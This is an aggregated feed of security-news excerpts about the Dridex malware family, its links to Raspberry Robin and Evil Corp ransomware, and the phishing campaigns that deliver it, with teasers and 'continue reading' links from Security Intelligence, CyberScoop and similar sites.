Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure […]

The post Raspberry Robin and Dridex: Two Birds of a Feather appeared first on Security Intelligence.

Continue reading Raspberry Robin and Dridex: Two Birds of a Feather

Evil Corp affiliates are using off-the-shelf ransomware to evade sanctions

Researchers found a number of similarities between Evil Corp and a new group of attackers.

The post Evil Corp affiliates are using off-the-shelf ransomware to evade sanctions appeared first on CyberScoop.

Continue reading Evil Corp affiliates are using off-the-shelf ransomware to evade sanctions

Attackers used Dridex to deliver Entropy ransomware, code resemblance uncovered

Sophos released a research that details code similarities in the general purpose Dridex botnet and the little-known ransomware, Entropy. The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designe… Continue reading Attackers used Dridex to deliver Entropy ransomware, code resemblance uncovered

Fake Christmas Eve termination notices used as phishing lures

A phishing campaign using a well-known malware families is employing a pair of particularly devious methods to trick targets into opening an infected file: fake employee termination notices and phony omicron-variant exposure warnings. A threat researcher going by the name of “TheAnalyst” posted a screenshot of the fake employment termination notice Dec. 22, attributing it to a Dridex affiliate. The suspicious email told the target that their employment would cease as of Dec. 24, and that the decision was not reversible. An attached password-protected Excel file promised additional details. Once a recipient opened a file, a blurred form appeared with a button to “Enable Content,” which enabled the file to run an automated script through its macros feature, a technique intended to help automation that simultaneously has been abused for years for malicious purposes. After the button was clicked, a pop-up window appeared: “Merry X-Mas Dear Employees!” Dridex is a […]

The post Fake Christmas Eve termination notices used as phishing lures appeared first on CyberScoop.

Continue reading Fake Christmas Eve termination notices used as phishing lures

Ransomware Gangs and the Name Game Distraction

It’s nice when ransomware gangs have their bitcoin stolen, malware servers shut down, or are otherwise forced to disband. We hang on to these occasional victories because history tells us that most ransomware moneymaking collectives don’t go away so much as reinvent themselves under a new name, with new rules, targets and weaponry. Indeed, some of the most destructive and costly ransomware groups are now in their third incarnation over as many years.

Reinvention is a basic survival skill in the cybercrime business. Among the oldest tricks in the book is to fake one’s demise or retirement and invent a new identity. A key goal of such subterfuge is to throw investigators off the scent or to temporarily direct their attention elsewhere.

Cybercriminal syndicates also perform similar disappearing acts whenever it suits them. These organizational reboots are an opportunity for ransomware program leaders to set new ground rules for their members — such as which types of victims aren’t allowed (e.g., hospitals, governments, critical infrastructure), or how much of a ransom payment an affiliate should expect for bringing the group access to a new victim network. Continue reading Ransomware Gangs and the Name Game Distraction

Hackers are using CAPTCHA techniques to scam email users

More email users fell for scams using CAPTCHA technology in 2020, a new report from security firm Proofpoint shows. The technique, which uses a visual puzzle to help authenticate human behavior, received 50 times as many clicks in 2020 compared to 2019. That’s still only a 5% overall response rate, researchers note. Comparatively, one in five users clicked attachment-based emails with malware disguised as Microsoft PowerPoints or Excel spreadsheets. Campaigns using attachments to hide malware made up one in four of the attacks researchers at Proofpoint monitored. “Attackers don’t hack in, they log in, and people continue to be the most critical factor in today’s cyber attacks,” Ryan Kalember, executive vice president of cybersecurity strategy at Proofpoint said in a statement. Researchers found that quantity continues to beat quality in email attacks. Proofpoint found that the highest number of clicks came from a threat actor linked to the Emotet botnet. […]

The post Hackers are using CAPTCHA techniques to scam email users appeared first on CyberScoop.

Continue reading Hackers are using CAPTCHA techniques to scam email users

Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts

IBM X-Force threat intelligence has been observing a rise in Dridex-related network attacks that are being driven by the Cutwail botnet. Dridex is delivered as a second-stage infector after an initial document or spreadsheet arrives via email with booby-trapped macros. Recipients who activate the macros unknowingly launch malicious PowerShell scripts that will download additional malware. […]

The post Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts appeared first on Security Intelligence.

Continue reading Dridex Campaign Propelled by Cutwail Botnet and Poisonous PowerShell Scripts

Email scam aims to drop Dridex on machines by impersonating FedEx, UPS

As more Americans rely on package deliveries during the coronavirus pandemic, scammers are trying to capitalize on the tracking process by sending spoofed emails containing malicious software. Hackers are sending spoofed emails that appear to be from FedEx, UPS and DHL as part of a mass emailing campaign meant to infect victims’ computers, according to research initially published on May 5 by the security vendor Votiro. The messages appear to include package tracking updates, though at least some of them aim to infect recipients with a strain of malware known as Dridex, which is typically used to steal bank account data. The messages usually ask recipients to download an invoice, or view their tracking information. Code in the images, links and header of the email all appeared to be legitimate, providing the hackers with cover. They also disguised many of the messages to make them appear as if they arrived […]

The post Email scam aims to drop Dridex on machines by impersonating FedEx, UPS appeared first on CyberScoop.

Continue reading Email scam aims to drop Dridex on machines by impersonating FedEx, UPS